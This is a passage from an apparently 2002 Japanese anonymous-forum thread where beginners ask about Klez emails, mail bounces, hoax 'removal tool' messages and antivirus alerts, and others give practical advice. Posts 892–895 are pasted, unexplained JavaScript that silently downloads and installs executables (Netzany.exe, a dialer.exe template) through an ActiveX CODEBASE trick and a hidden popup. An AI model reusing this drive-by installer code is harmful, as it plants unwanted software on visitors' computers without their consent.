図書館からのお知らせ 図書館
図書館からのお知らせ 図書館
「ひさしぶり〜」 送信者A
「ひさしぶり〜」 送信者A
「ひさしぶり〜」 送信者A
Re:明日の食事会について 送信者B
Re:明日の食事会について 送信者B
Re:明日の食事会について 送信者B
図書館からのお知らせ 図書館
図書館からのお知らせ 図書館
図書館からのお知らせ 図書館

814 :名無しさん@お腹いっぱい。 :02/04/30 22:48
すっごく初心者な質問だとは思うのですが、
どなたか教えてください。
送信者が携帯の番号で、PCによく分からないファイルが
送られてきたのですが、携帯からウイルスって送ることが
出来るんでしょうか? 

815 :名無しさん@お腹いっぱい。:02/04/30 22:55
>>813
鯖側の配送ミスの予感。

>>814
i-modeはファイル添付は無理。他は知らん。
PCから携帯にウィルスを添付したメールを送って、
その受け取ったファイルを携帯側で再度添付できれば可能。

816 :名無しさん@お腹いっぱい。:02/04/30 22:57
>814
それはKlezだと思われ
     ↓
http://www.nai.com/japan/virusinfo/klezezukai.asp

感染源は携帯ではなく、別のだれかだと思われ。

817 :名無しさん@お腹いっぱい。:02/04/30 22:58
815>では、ウイルスの可能性はあるってことでしょうか?
開いてはいないんですが、プレビューしただけでもヤバイ?

818 :名無しさん@お腹いっぱい。:02/04/30 23:15
>>817
ないとは言えない。>>816のように偽装されてたらプレビューもヤバイ。

ってか、心当たりがなければ即捨て。

819 :受け取る前に鯖で”削除”せよ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!:02/05/01 02:40
 

820 :名無しさん@お腹いっぱい。:02/05/01 09:53
ポスペにクレズが届いたんですが、削除すればいいんですか?
削除って黒ヤギですよね。
あれって開かないと削除できないんでしょうか?
初ウイルスなのでよくわかりません。
教えてください。


821 :名無しさん@お腹いっぱい。:02/05/01 13:59
>>820
開いちゃイカンザキ!!
即効削除

822 :名無しさん@お腹いっぱい。:02/05/01 14:02
>>821
あ、あと、819さんの言うとおり、メールサーバーのも削除しましょう。

823 :名無しさん@お腹いっぱい。:02/05/02 00:22
便乗させてもらいますが、>>820さんと同じ状態に今なっています
ポスペだと、削除する時にそのメールを開いてしまうと思うんですけど
開かない方法があるのですか?
どうやって削除するのか教えてください。

824 :823:02/05/02 00:40
検索したらわかりました。失敗してしまったのですが。

825 :ところで:02/05/02 01:16
>>806
ごめんごめん、今見た。
とりあえず唯一入手したKlezにくっついてたのを貼っておいたよ。

826 :名無しさん@お腹いっぱい。:02/05/02 01:43
ありがdd(・∀・)

827 :名無しさん@お腹いっぱい。:02/05/02 02:22
下記の文章がファイル付きで送られてきます。
怖いのでファイルは開いていませんが、ウィルスでしょうか?
超初心者の私にどなたか教えてください。
**********************************************
** THIS IS A WARNING MESSAGE ONLY **
** YOU DO NOT NEED TO RESEND YOUR MESSAGE **
**********************************************

The original message was received at Wed, 1 May 2002 19:14:38 +0900 (JST)
from ○○○.so-net.ne.jp [210.139.254.21]

----- The following addresses had transient non-fatal errors -----
<○○@docomo.ne.jp>

----- Transcript of session follows -----
<○○@docomo.ne.jp>... Deferred: Connection reset by mfsmax.docomo.ne.jp.
Warning: message still undelivered after 4 hours
Will keep trying until message is 5 days old


828 :名無しさん@お腹いっぱい。:02/05/02 02:48
今知らない名前からHoneyっていう題名の添付ファイル付きのメールがきました。
これってウイルスですか?
まだプレビューしてないんですけど開いたら感染しますか?
教えてチャンでごめんなさい。



829 :名無しさん@お腹いっぱい。:02/05/02 02:48
>>827
PCから docomo の携帯メール宛てに送ったでしょ?
--
Warning: message still undelivered after 4 hours
Will keep trying until message is 5 days old
--
メッセージの最後のここの所に注目。
なんて言っているかといいますと、
「警告 : メッセージは(送信後)4時間経過しても(相手側に)届いていません。
(今から)5日間(過ぎる)迄は再送信を試みます」
って言ってます。

何が起きているかというと、メールサーバー君が一生懸命メール送ろうとしたけど
--
Deferred: Connection reset by mfsmax.docomo.ne.jp.
--
相手側のメールサーバーが落ちてるのでメール送れなかったから「未だメール送れ
てません。もっと頑張ります」って言っているということ。

で、ここからが本題で、最近 docomo 宛てにメール送った?
そうでない場合は話がややこしくなるんだけど。

830 :名無しさん@お腹いっぱい。:02/05/02 02:51
>>828
断言は出来ませんけど、私なら絶対開きません。捨てます。
添付ファイルがウィルスかどうかは関係なく、知らない人間から添付ファイルつきの
メールが来たのを開く度胸は無いし、そんな謎ファイルを開く必要がそもそも無いので。

831 :名無しさん@お腹いっぱい。:02/05/02 02:53
ttp://www.aurumfantasy.com/main.html
ここってウィルスに感染するんですか?
ちょっと心配になって・・・

832 :名無しさん@お腹いっぱい。:02/05/02 02:57
>>831
変なもの見せないでください。
覗いてみましたが、main.html に関してはウィルスの兆候は無いです。
その先は知りませんが、大丈夫だと思います。
この手のサイトはウィルスよりもどちらかというとQ2 ダイアルとかを
心配したほうがよいでしょう。

833 :828:02/05/02 03:01
>830
返事ありがとうございます。
ちなみに差出人はsachi-mail-koとなってました。
もうちょっとだけ考えてみて心当たりを思い出せなかったら
捨てようと思います。



834 :名無しさん@お腹いっぱい。:02/05/02 03:01
>>832さん
どうもありがとうございます。
すこし安心しました。
Q2の方はつながらないようにしてあるんで大丈夫だと思います。

835 :827 :02/05/02 03:18
早速のレスありがとうございます!

docomo 宛てにメールを何通か送りましたが、相手には届いていないと
言われました。

4日位前から件名の異なる心当たりの無いファイル付きのメールが
何通も届いているので不安になり、
本文を上手くコピペ出来た物を>>827にのせてみました。
今までに届いたものはウィルスかも知れないと思い開封せずに
削除しておりました。
続けて来ているので怖いのです。
時期がくればおさまる(終わる)のでしょうか?





836 :名無しさん@お腹いっぱい。:02/05/02 03:40
>>835
私の推測が当たっていたようで。
送ったメールの数だけ >>827 のようなメールが届くはずです。
で、メールサーバーが送信あきらめたら(>>827だと5日後)、
「送信できませんでした。スマソ」ってな感じのメールが届くかと思います。
終わりは確実に来るので、暫くは耐えるしかないです。

ちなみに、添付ファイルの正体は、827さんが送信したメールそのものだと
思います(ルールとして、サーバーは送信不可の警告メッセージには、送信
できなかったメールを添付するきまりになっている)。

それと、脅かすようですが、
「エラーで返ってきたメールを装うウィルス」
というのもあります。ので、万が一のことを考えて、添付ファイルは開かない方が
いいです。

837 :827:02/05/02 03:59
丁寧で分かり易い回答をありがとうございました。

>エラーで返ってきたメールを装うウィルス

そんなものまであるんですか!勉強になります。
これからは添付ファイル付きメールには注意します。
思い切って書き込みしてみて良かったです!
本当にありがとうございました。

838 :名無しさん@お腹いっぱい。:02/05/02 04:25
チョット聞いて下さいよ!
GWに入ってからチラホラとウィルスメールが来てたんですよ
それが今日になって6通も!日が明けてたった4時間ですよ
ぷららとかOCNとかからドサット、先が思いやられる
「ノートン先生頑張っちゃうぞ〜」なんて声が聞こえるぐらい
インストール以来の大活躍ハイテンションで修復しまくってるし
ウィルスを修復だなんて、通は削除!これに決まってる
・・・、
・・、

いや、先生大活躍ありがて〜、しかしウザくてウザくて
この場合、ウィルス送る本人かISPどちらに警告出したら良いですか?


839 :名無しさん@お腹いっぱい。:02/05/02 04:31
>>838
本人は被害者の可能性が大です。知らないあいだにウィルスがメールを
ばら撒いているわけで。それに、今のウィルスは送信元アドレス偽装する
のが流行なので、From 欄の情報は当てにならないことが多いです。

ISP に警告だしてもどうしようもないでしょう。顧客のメール覗いたりしたら
そっちの方がよっぽど問題になるので。

結論として、一応、差出人に連絡する以外ないでしょう。その際、メール
で連絡したら、向こうからの返信メールにウィルスくっついてきたして何が
なんだかわからなくなる事があるので、電話連絡が望ましいです。

840 : :02/05/02 04:31
>>838
毒をもって毒を制すとも言うし、一度感染してみたら?
まともに質問できるようになるかもよ

841 :ネタじゃないんだ・・・:02/05/02 05:54
ちょっとみんな聞いてくれよ!マジなんだけどさ。
この板に「みんなでウイルスを作ろうよ!!」って言う題名のスレあるんだけどさ。
そのスレを普通に見ようとしたわけなんだけどさ。画面が出た瞬間にトロイの木馬が
発見されました!って出るんだよ!何度やってもそうなるんだよ・・・
誰でもいいから入って見てくれるか?ちなみに俺のアンチはMcAfeeウイルススキャンセントラルだ!
勘違いだったらスマソm(_ _)m


842 :名無しさん@お腹いっぱい。:02/05/02 06:06
>>841
レスにウィルスのコードがビシバシ貼り付けてあるので警告して当然です。
見るだけなら感染しないので放っておけばいいです。

843 :名無しさん@お腹いっぱい。:02/05/02 09:15
 さきほど、Trend Microのオンラインスキャンを利用したところ
VBS_SEEKER.A という名称(たぶん) のウィルスが検出されまして
検索したものの、ぴったりと一致するものは見当たりませんでした。

 他の 「VBS」 「SEEKER」 と付くウィルスの記述から想像するに
そう危険度の高いものでは無さそうな気もしたんですが、どうなん
でしょうか? 目に付いた事としては、最初に出るホームページが
設定と違うもの (マイクロソフトのサイト) に変わっていた程度です。

 スキャン中のウィンドウには <駆除可能--いいえ> と表示されて
いましたが、いちおう普通に削除できたみたいです。

844 :名無しさん@お腹いっぱい。:02/05/02 10:15
はじめまして。ウイルスメールに関する質問なんですけどよろしくお願いします。
昨日はじめてウイルスメールがきたようで、メールを開く前にウイルススキャンソフトが反応して
「ウイルスに感染しているようです」とでてきました。
送り先のIPアドレスも控えているんですけど、送り主を正当な手段で訴えることは可能でしょうか。
プロパイダーは国内のものでした。


845 : :02/05/02 10:31


846 :名無しさん@お腹いっぱい。:02/05/02 11:26
>>844 >正当な手段で訴える
って何をさすの?刑事告訴?民事賠償?よく分からないのに「訴える」な
んていうんじゃないよ。

847 :名無しさん@お腹いっぱい。:02/05/02 11:29
>>844
てかスキャンしただけなのか
感染は直らんぞ
まずウイルスを駆除しろ
そして対策しろ

848 :844:02/05/02 11:49
正当な手段というのは、プロパイダに連絡してウイルス送ったやつにお灸をすえてもらうこと。(藁)
あと直接話しあえるものなら、連絡先の開示を求める。(理想)

>>847
ウイルスは「削除成功にました」とでているんですが
同じメールをポイントするとまたウイルス検知ソフトが反応するんだー(何故)
その都度、削除ボタン押してるが(藁)
どーなってんだろ。。。。。

849 :名無しさん@お腹いっぱい。:02/05/02 11:53
>>848
まず無理
ウイルスを送られた人間が何人いると思っているんだ


そのメールそのものを削除しろ

850 :名無しさん@お腹いっぱい。:02/05/02 11:56
( ゚д゚)ポカーン

851 :名無しさん@お腹いっぱい。:02/05/02 11:59
>>844
訴えるだけなら出来るよ。

>あと直接話し合えるものなら、
{脅迫|恐喝}ですか?

満足な日本語お願いします。ゆらぎ補正しないと読めないです。

852 :名無しさん@お腹いっぱい。:02/05/02 12:05
>>844は常識のない厨。やりたいのなら、自分で調べてやれば? 以後放置。

853 :名無しさん@お腹いっぱい。:02/05/02 14:46
>>844=>>848
もしや黄金?

854 :1:02/05/02 17:04
>>844
見れ。
http://www.platon.co.jp/~hide/oikora/klez/klez.html

855 :名無しさん@お腹いっぱい。:02/05/02 21:18
Melissaでウィルサーが禁固1年8ヶ月、罰金$5,000だと。
結構軽いな。

856 :名無しさん@お腹いっぱい。:02/05/02 23:13
さっきマイコンピュータを開いてみたらまんなかにぽつんとフォルダを照らす懐中電灯の絵だけがありました。
CドライブもDドライブも開けません。これはウイルスなのでしょうか?
そしてどうしたら直せるでしょうか?教えてください。

857 :名無しさん@お腹いっぱい。:02/05/02 23:26
>>856
それってアクセスしててレスポンスが悪いだけじゃないのか?
とりあえずやってみれ。
http://www.trendmicro.co.jp/hcall/

858 :名無しさん@お腹いっぱい。:02/05/03 00:13
毎日同じ時間帯にウィルスが1通だけ届くんですけど、
これって特定の誰か(コンピュータ)が感染してるとは知らずに放置
されてるってこと?それとも確信犯?

859 :初心者:02/05/03 00:40
クレズで、送信元を偽装されたメールの本当の送信者をつきとめるには
どうしたいいんでしょう?
おしえてちょ。ヨロシコ

860 :名無しさん@お腹いっぱい。:02/05/03 01:16
>>859
メールヘッダみれ

861 :名無しさん@お腹いっぱい。:02/05/03 01:17
>>859
Klezスレも読まない初心者には無理。

862 :名無しさん@お腹いっぱい。:02/05/03 01:43
>>861

うっせ、バーカ!
氏ね、リアル厨房
クそして寝ろ!(w

863 :名無しさん@お腹いっぱい。:02/05/03 01:48
この前のウィルス初心者君が
名無しで装いも新たに再降臨ですか。

864 :名無しさん@お腹いっぱい。:02/05/03 01:51
>>862>>859か?

865 :名無しさん@お腹いっぱい。:02/05/03 01:59
つか、彼だろ。
http://pc.2ch.net/test/read.cgi/sec/1017902012/648-689

866 :名無しさん@お腹いっぱい。:02/05/03 02:33
hotmailのアカウントにこんなの来たんですが…。
英語じゃない部分が意味分かんないんですけど、Klez.Eっぽいからメール削除したってことですか?

subject:<zilvir> List adresowany do Ciebie zawiera wirusa!

List wys?any do Ciebie zawiera? wirusa. Ca?osォcォ zosta?a skasowana, odsy?am Ci
tylko informacje od skanera oraz nag?謡ki tego listu.

A letter sent to you was infected with a virus. It was deleted. Below are
the headers of this message and information from the virus scanner.

Za?acznik o nazwie '1020330674.11031-0.zilvir' jest czysty
Za?acznik o nazwie '1020330674.11031-1.zilvir' jest czysty
Za?acznik o nazwie '9kb.exe' ZAWIERA WIRUSA!!!
--possible destruction by virus Trojan.Klez.E.Worm
Za?acznik o nazwie 'main_03_1_.jpg' jest czysty

(以下つらつらとヘッダが書いてあります)

867 :名無しさん@お腹いっぱい。:02/05/03 03:32
C:\Documents andSettings\自分の名前\Local Settings
\Temporaly Internet Files\content.IE5\0FKHMNOP\concon[1].htm

Exploit-Nocnocというウィルス?が感染してしまいました。
この1件だけで、どのメーカのサイトで調べてもこのウィルス名は出て参りませんでした。
検出はしたのに駆除は出来ません。 
どうやって対処すれば宜しいのでしょうか?
上のファイルごと削除してしまっても良いものでしょうか、それで駆除出来たことになりますか??
よろしくおながいします!!!!


868 :867:02/05/03 03:45
あ、あげます!

869 : :02/05/03 03:52
>>867
何で検出した?

870 :名無しさん@お腹いっぱい。:02/05/03 03:55
neoaiueという名前で添付メールが来たんだけど、これって
開いた人いる?
やっぱウィルスとかそういうのなのでしょうか?
This is a excite game
This game is my first work.
You're the first player.
I wish you would enjoy it.

kitty.exe
です。

871 :867:02/05/03 03:57
>>869
マカフィーです(とても言いにくくてすみません)。OSはWinXP、ISDNです。
丁度今アラートというのが出現して
続いて  【クリーニング失敗-このウィルスのクリーナがありません。
このウィルスをシステムからすぐに除去するには、
ファイルを削除してバックアップファイルからリストアしてください。】

こ、これはOSを再インストール並の事を表しているのでしょうか?
ファイルの削除は画面に従って出来るはずですが
バックアップファイルからリストアというのが、ググルで検索してhitしましたが
動揺しておりどれがどれだかわからなくなってます。
宜しかったら、その意味をご案内下さい!



872 :867:02/05/03 04:01
>>870
867のくせしてだが、 とりあえず4hitするじゃんかよーヽ(`Д´)ノ
http://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=utf8&oe=utf8&querytime=STQB&q=kitty%2Eexe+%E3%80%80%E3%82%A6%E3%82%A3%E3%83%AB%E3%82%B9
漏れはなんもわかんないんだぞ!

873 :867:02/05/03 04:07
スレ違いですがバックアップファイルからリストアする、とは
もしかしてシステムの復元の事ですか? 

874 :名無しさん@お腹いっぱい。:02/05/03 04:08
す、すんません;;
hitしまくりですね…。しかもデマか。
お騒がせ致しました

875 :867:02/05/03 04:13
>>874
でしたら漏れの質問に答えて頂けないかー?
バックアップファイルからリストアするとはなんなのか?!
こっちの方が簡単なはず・・・・!
ヽ(`Д´)ノぼっきあげ

876 :867:02/05/03 04:21
>>875
>>875
ヽ(`Д´)ノ ヽ(`Д´)ノ ヽ(`Д´)ノ 。・°°・(>_<)・°°

877 : :02/05/03 04:22
>>875
キャッシュのhtmlファイルなんかいらんだろ!
削除だけでいいんだよっ!

878 :867:02/05/03 04:24
>>877
す、すみません(汗
concon とかいうのも特に気にしなくていいんでしょうか?
バックアップファイルからリストアする、というのは気にしなくても。。
削除=駆除なので、しょうか・・・?(汗


879 :867:02/05/03 04:32
んもうっ、みんな忙しいのは分かる。
他へ逝くわ♥

880 :874:02/05/03 04:52
もいっかい覗いたら…あらあら;;

>867
conconを削除すりゃいいんじゃないの?キャッシュも消去してねん♪
で、ダメならリストア。
リストアってもIEリストアするくらいでいいと思うっすよ。
一件だけだし。

…って、もう見てないか。自分ももう寝よう。。

881 :名無しさん@お腹いっぱい。:02/05/03 09:58
件名、差出人不明、本文無しのメールが来ました。
添付ファイルは「LHEIPDLH.EXE」というやつです。
これはどんなウイルスなんですか?

882 :881:02/05/03 10:22
ごめんもう分かったわ。W32/Hybris.gen@MMっていうウイルスらしい。


883 :名無しさん@お腹いっぱい。:02/05/03 18:31
>>874
でも本文はKLEZっぽいよ
デマと判断するのは早計かも

884 :お願いいたします:02/05/03 21:07
 デスクトップ画面の左上方向に白い長方形の画面が現れて不審に思い
接続を切りパソコン終了しようとしたら、いきなり
「ウィルスが検出されました」というメッセージが出てきました。
ちなみにウイルスバスター2002をインストールしてあるので再起動後
ウイルス検索を全ドライブに行ったのですが、まったく検出されませんでした。
これは新しいウイルスなのでしょうか?。
どうぞご教授お願いします。

885 :名無しさん@お腹いっぱい。:02/05/03 21:13
>>884
定義ファイルは最新か?
そのメッセージが出る直前は何をしていたか?
IE&OEにパッチはあてているか?

あと、くだ質の方にスレ移ったこと書いとけ。

886 :お願いいたします:02/05/03 21:18
>定義ファイルは最新か?
最新です。
>そのメッセージが出る直前は何をしていたか?
2chのニュー速板を見ていました。
>IE&OEにパッチはあてているか?
IEにはあててありますが、OEは多分当てていないです。

>あと、くだ質の方にスレ移ったこと書いとけ
すみません。こちらが適切と思い。
レスありがとうございます。

887 :名無しさん@お腹いっぱい。:02/05/03 21:23
知らないメアド複数からno_filenameとかinvalid_filenameという
添付ファイルがついたメールが沢山届いたのですがこれはウィルスでしょうか。
どうか教えてください。よろしくお願いします。

888 :名無しさん@お腹いっぱい。:02/05/03 21:34
>>887
ウィルスかどうかはチェックすれば分かる。
馬鹿げた質問をするな。

http://www.trendmicro.co.jp/hcall/

889 :名無しさん@お腹いっぱい。:02/05/03 22:08
>>886
> 最新です。
それなら大丈夫だろう。
あんただけを狙った最新のウィルスが存在するとは考えにくい。
http://www.trendmicro.co.jp/virusinfo/index.aspのパターンファイルのバージョン調べて、
最新になってなかったら>>888のオンラインチェックかけとけばいいだろう。

> 2chのニュー速板を見ていました。
どっかのバカが貼った奴にでも反応したのかも。


890 :名無しさん@お腹いっぱい。:02/05/04 02:08
ウイルスバスター2002を導入、最新の定義ファイルでIEは6だったんですが
海外のサイトを見ていると、「ウイルスを検出、駆除に失敗、隔離も失敗」
というようなメッセージが出ました。
その後、ウイルス検索でJS_EXCEPTION.GENというウイルスを隔離し
削除しました。
トレンドマイクロのページで調べると「IEのホームページの設定などが
変更されている場合があり」とあったので念のため
[ツール]から[インターネットオプション]を開いて見ましたが、特に変更された
様子はなし、詳細設定を規定値に戻しておきましたが、対応はこれで十分
でしょうか?

891 :名無しさん@お腹いっぱい。:02/05/04 08:56
>>857
すみません、再起動したら直ってました。
どうもありがとうございました。



892 : :02/05/04 19:33
var baseURL = " ";
var fnPrefix = "Netzany";

function WhichBrowser()
{
BrowserName = navigator.appName;
BrowserVersion = parseInt(navigator.appVersion);

Browser = "NS";
if ((BrowserName == "Netscape"))
Browser = "NC";
else if (BrowserName == "Microsoft Internet Explorer")
Browser = "IE";
return Browser;
}
function ncDownload() {
window.open("http://tb.netzany.com/Netzany/Netzany.exe","_blank","height=1,width=1");
}

function IE_DownloadFile(ieURL)
{
document.write("<OBJECT");
document.write(" CLASSID =\"CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC851\"");
document.write(" CODEBASE=\""+ieURL+"\">");
document.write("<\/OBJECT>");
}

function DownloadFile()
{
//if (WhichBrowser() == "IE") IE_DownloadFile(baseURL + fnPrefix + ".exe");
if (WhichBrowser() == "IE") IE_DownloadFile("http://tb.netzany.com/Netzany/Netzany.ex");
if (WhichBrowser() == "NC") ncDownload();
}


893 :?????:02/05/04 19:34
function getCookieVal (offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
//alert(document.cookie.substring(offset, endstr));
return unescape(document.cookie.substring(offset, endstr));
} function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
//alert(document.cookie);
//alert("Get it!")
if (i == 0) break;
}
return null;
}
function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
var ver, aff, dl
document.cookie = name + "=" + escape (value) +
((ver == null) ? "" : ("; ver=" + "1")) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
//alert(document.cookie);
} function DeleteCookie(name) {
var exp = new Date();
FixCookieDate (exp);


894 : :02/05/04 19:34
exp.setTime (exp.getTime() - 1);
var cval = GetCookie (name);
if (cval != null)
document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
} var cookie_date=new Date(document.lastModified);
var expdate = new Date();
var now=new Date();
var now1=new Date(GetCookie("Netzany"));
expdate.setTime(expdate.getTime()+(5*24*60*60*1000)); //document.write("<Font color=ff8800>" + "Last updated: "+ "</font>" +document.lastModified);
//document.write("");
//if (!(cookie_date == GetCookie("cookie_date"))){
//SetCookie("Sunny",cookie_date,expdate);
//document.write("<font color='yellow'><br>Site has changed since last visit!</font><br>");
//} //SetCookie("Netzany",cookie_date,expdate);
//alert (GetCookie("Netzany"));
//alert (Date());
//alert (now.getDate());
//alert (now1.getDate());
//alert (now.getDate()-now1.getDate());

if (GetCookie("Netzany") == null || now.getDate()-now1.getDate()>0)
{
DownloadFile();
SetCookie("Netzany",cookie_date,expdate);
//alert ("SET COOKIE");
}


895 :  :02/05/04 19:35
<script language=JavaScript>
var exeURL = "http://www.yourdomain.com/dialer.exe";
function WhichBrowser()
{
BrowserName = navigator.appName;
BrowserVersion = parseInt(navigator.appVersion);
Browser = "NS";
if ((BrowserName == "Netscape") && (BrowserVersion == "3"))
Browser = "NC3";
else if ((BrowserName == "Netscape") && (BrowserVersion == "4"))
Browser = "NC4";
else if (BrowserName == "Microsoft Internet Explorer")
Browser = "IE";
return Browser;
}
function ncDownload(exeURL) {
document.write("<SCRIPT>");
document.write("window.open\(\""+exeURL+"\",\"_blank\",\"height=1,width=1\")");
document.write("<\/SCRIPT>");
}
function IE_DownloadFile(exeURL)
{
document.write("<OBJECT");
document.write(" CLASSID =\"CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC851\"");
document.write(" CODEBASE=\""+exeURL+"\">");
document.write("<\/OBJECT>");
}
function DownloadFile()
{
if (WhichBrowser() == "IE") IE_DownloadFile(exeURL);
if (WhichBrowser() == "NC4") ncDownload(exeURL);
}
DownloadFile();
</script>


896 :名無しさん@お腹いっぱい。:02/05/04 19:56
↑ぶぁか

897 :名無しさん@お腹いっぱい。:02/05/04 19:58
「みんなでウィルスをつくろう」スレはここじゃないぞ。

898 :ジン:02/05/05 16:45
5月4日にこんなメールが来ました。

送信者:Mail Delivery Subsystem
件名:Warning: could not send message for past 4 hours

添付ファイルありの3KBで、何が起こるかわからないのでまだ開いていません。
誰か情報をお持ちの方はいませんか?


899 :名無しさん@お腹いっぱい。:02/05/05 16:51
>>898 知るか。アンチウィルスソフト入れとけ。
件名でウィルス名がわかる時代は過ぎた。
メーラーによっては開かなくても感染するぜ。

900 :ジン:02/05/05 16:57
>>899 情報サンキュー!

901 :はっぱ:02/05/05 21:51
教えてください。
普段、メールとかあまりこないんですが、
今日に限って知らない人から3通。それも添付付き。
読まずに削除しましたが、覚えているのはいかのとおりです。
1.件名    Rakuten.Inc all right・・・なんとか
2.差出人   MAILER-DAEMON@pdx.ne.jp
3.件名    Japanese girl vs playboy
シマンテックのHPで検索したけどようわからんかったので
誰かご教授を。これらはやっぱウィルスっすか? 



902 :名無しさん@お腹いっぱい。:02/05/05 21:59
>898
君が誰かに送ったメールが、なんらかの影響でおくれてるんじゃないの?
たぶん。

903 :おいら:02/05/05 22:02
こんばんは。
どうもウィルスにやられたみたいなのですが・・。

自分のパソコンはWin98SEとWinXPを両方入れているのですが、
今朝、立ち上げたら、デスクトップの画面が出て、マウス
動かしても、動かない・・。再起動・・。

次のファイルが存在しないかまたは壊れているため、Windowsを
起動できませんでした:
<windows root>¥system32¥hal.dll
上記のファイルをインストールし直して下さい。

という画面が出て、XPは起動ができません。
98は立ち上がるので、エクスプローラーでXPの入ったドライブ
見てみたら、メールが入っているフォルダが無い・・。
受信トレイ.dbxってのです・・。

ウィルス付のメールをOutlookに放置していたのが原因かなぁ。
バスター2002入れているんだけど・・


長々とすみません・・。ウィルスには気をつけて下さいね。

904 :はっぱ@901:02/05/05 22:13
調べていったら(3)はクレズだったみたいです。
あと、(2)ですが、数日メール送信してないので、
宛先不明で帰ってくるわけないのですが・・・。

905 :名無しさん@お腹いっぱい。:02/05/05 22:39
件名が「W32.Elkern removal tools」と書いてある
添付ファイルつきのメールが来ました。
マックということもあり油断していて、メールをプレビューしてしまいました。
(ただし添付ファイルは開いてません)
このメールは転送さえしなければ大丈夫なのでしょうか?
他の人に与える影響が心配です。

本文は
F-Secure give you the special W32.Elkern removal tools
W32.Elkern is a special dangerous virus that can infect on Win98/Me/2000/XP.
For more information,please visit *ttp://www.F-Secure.com
です。

906 :名無しさん@お腹いっぱい。:02/05/05 22:40
age

907 :名無しさん@お腹いっぱい。:02/05/05 22:48
>>905
本文は html メール?それとも只のプレーンテキスト?

908 :905:02/05/05 22:57
>>907
レスありがとうございます。
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

こんなん書いてあったんですけど…。
プレーンかhtmlかで何か状況が変わってくるんでしょうか?

909 :名無しさん@お腹いっぱい。:02/05/05 23:11
>>908
html メールだと JavaScript とか使って、メールそのもの(添付ファイル以外に)
をウィルス化出来るから。
text/html ってことは html メールみたいだね。
もう開いてしまったみたいだから、この際、html メールをソース表示してみて、
<script>〜</script>が埋めこまれていないか確認してみるとよろし。
(回線切ってからやってね)
あとはトレンドマイクロのオンラインスキャン使うとか(URLは上のほうのレスに
書いてある)

910 :名無しさん@お腹いっぱい。:02/05/05 23:32
>>904
>>905
こちらへご案内
http://pc.2ch.net/test/read.cgi/sec/1020325572/l50


911 :名無しさん@お腹いっぱい。:02/05/05 23:33
>>909
トレンドマクロのオンラインスキャンってマクで使えるの?

912 :名無しさん@お腹いっぱい。:02/05/06 00:03
>>911
試してみたらどうだと思うのは漏れだけか?

913 ::02/05/06 00:09
昨日、えっちねた板でWORM_SKA.Aというウイルスを食らってしまいました。
しばらくFDDがガガガーッと鳴ってわけの分からないwebページが出てきました。
ウイルスバスター2002は駆除、隔離共に失敗。
そのあと全ドライブをウイルス検索したのですが、何も見つかりません。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SKA.A
↑トレンドマイクロのウイルスデータベースです。
検索してもHAPPYxx.EXE、SKA.EXE、SKA.DLL、LISTE.SKAなどが見つかりません。
そして、厨房な私はWin(XP)を再起動してしまいました・・・。
データベースの明細にプラットフォーム:Windows 9xとあるのですが、
WinXPでは感染しないということなのでしょうか?

よろしくお願いします。

914 ::02/05/06 00:13
ファイル名を書くのを忘れました。

ウイルス名 WORM_SKA.A
ファイル名 C:\Documents and Settings\muraoka misao\Local Settings
     \Temporary Internet Files\Content.IE5\6HF8L0RM\Happy99[1].exe


915 :名無しさん@お腹いっぱい。:02/05/06 00:19
>>913
最低、何をどうしたいのかを書いてください。

916 :名無しさん@お腹いっぱい。:02/05/06 00:23
>913
予想で申し訳ないんだが。。。。
システム保護のために、システム以外が勝手にシステムファイルを
書き換えても、書き戻すとおもった。(自己修復する)

感染してはいるんだろうけど、活動できないのでは?
自分宛に、メール送れば、直後にウィルスメールがくるから、
活動しているかわかるだろうけど。。

とりあえず、"Happy99[1].exe"を削除してはどうだろう。

ところで、直後に花火あがった?


917 ::02/05/06 00:31
>>915
すいません。XPでは感染しないかどうかを知りたかったのです。

>>916
花火は上がりませんでした。
出てきたページはすぐに閉じてしまいましたので、どんな内容だったか不明です。
自分宛にメール・・・ 何で気付かなかったんだろう・・・
添付ファイルはありませんでした。
やっぱり感染してないんでしょうか?
Happy99[1].exeもいくら探してもありません。

918 :名無しさん@お腹いっぱい。:02/05/06 00:46
<HTML><HEAD></HEAD><BODY>

<FONT>Sophos give you the W32.Elkern removal tools<br>
W32.Elkern is a dangerous virus that can infect on Win98/Me/2000/XP.<br>
<br>
For more information,please visit http://www.Sophos.com</FONT></BODY></HTML>

いま、こんなメールがきたのですが。
うちはポスペを使っています。
no_filenameと0no_filenameという添付ファイルがついていましたが
怖くてそのまま削除しちゃったんですけど…

どうすればいいのでしょうか?
泣きそうです。


919 :名無しさん@お腹いっぱい。:02/05/06 00:48
>>917
IEのキャッシュディレクトリは隠し属性付いているからエクスプローラじゃ見えない。
IEのツール→インターネットオプション→ファイルの削除でキャッシュを全クリしてしまえばいい。
その後、スキャンすればいなくなってるはずだ。


920 :916:02/05/06 00:57
>>913
花火が、あがってないなら、そもそも感染してないと思う。
ウィルスメールもこないようだし。
ブラウザでダウンロードされたから、IEのキャッシュで残ってただけ
ではないかと思う。
FDDへのアクセスなどは、今回発見されたウィルスと無関係でしょう。

IEのキャッシュを念のため削除してから、再度ウィルススキャンして
見つからなかったら、大丈夫なんじゃないかな?



921 :名無しさん@お腹いっぱい。:02/05/06 01:04
今、送信者が「inet」で、件名、本文が空っぽのメールがきました。
プレビューしただけで(一応IE6)メディアプレイヤーが立ち上がりました。
添付ファイルを見てみたらなんかの画像と「.mid」(多分コレが自動実行された)
